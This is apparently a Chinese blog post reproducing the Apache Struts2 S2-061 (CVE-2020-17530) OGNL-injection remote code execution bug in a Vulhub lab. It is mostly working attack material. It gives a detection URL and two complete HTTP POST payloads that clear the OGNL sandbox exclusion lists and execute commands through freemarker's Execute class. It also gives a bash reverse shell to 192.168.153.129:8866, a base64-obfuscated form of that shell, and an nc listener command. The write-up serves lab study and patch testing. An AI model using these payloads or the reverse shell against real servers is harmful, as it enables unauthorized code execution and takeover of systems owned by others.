本文最后更新于678 天前,其中的信息可能已经过时
1. 漏洞简介
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
2. 漏洞描述
Struts2 会对某些标签属性(比如 `id`,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时,用户再传入一个 `%{payload}` 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。
3.环境搭建
Vulhub:https://vulhub.org/#/environments/struts2/s2-061/
cd struts2/s2-061 #切换目录
docker-compose up -d #拉取环境
4.漏洞复现
1.访问环境
2.漏洞检测
poc-简单的漏洞利用程序或者测试代码
http://192.168.153.129:8080/?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d
3.漏洞利用
payload-1
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831
——WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name=”id”
%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“id“)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}
——WebKitFormBoundaryl7d1B1aGsV2wcZwF–
执行截图
payload-2
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1361
——WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name=”id”
%{
(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +
(#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) +
(#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +
(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) +
(#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +
(#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) +
(#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +
(#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +
(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘id‘}))
}
——WebKitFormBoundaryl7d1B1aGsV2wcZwF–
4.反弹shell
反弹shell命令
bash -i >& /dev/tcp/192.168.153.129/8866 0>&1
使用bash -c反弹shell,并且把上面bash -i的命令base64加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1My4xMjkvODg2NiAwPiYx}|{base64,-d}|{bash,-i}
攻击机nc监听
nc -lvnp 8866
执行反弹shell payload
攻击机成功拿到shell
参考文章:https://www.cnblogs.com/backlion/p/14122528.html
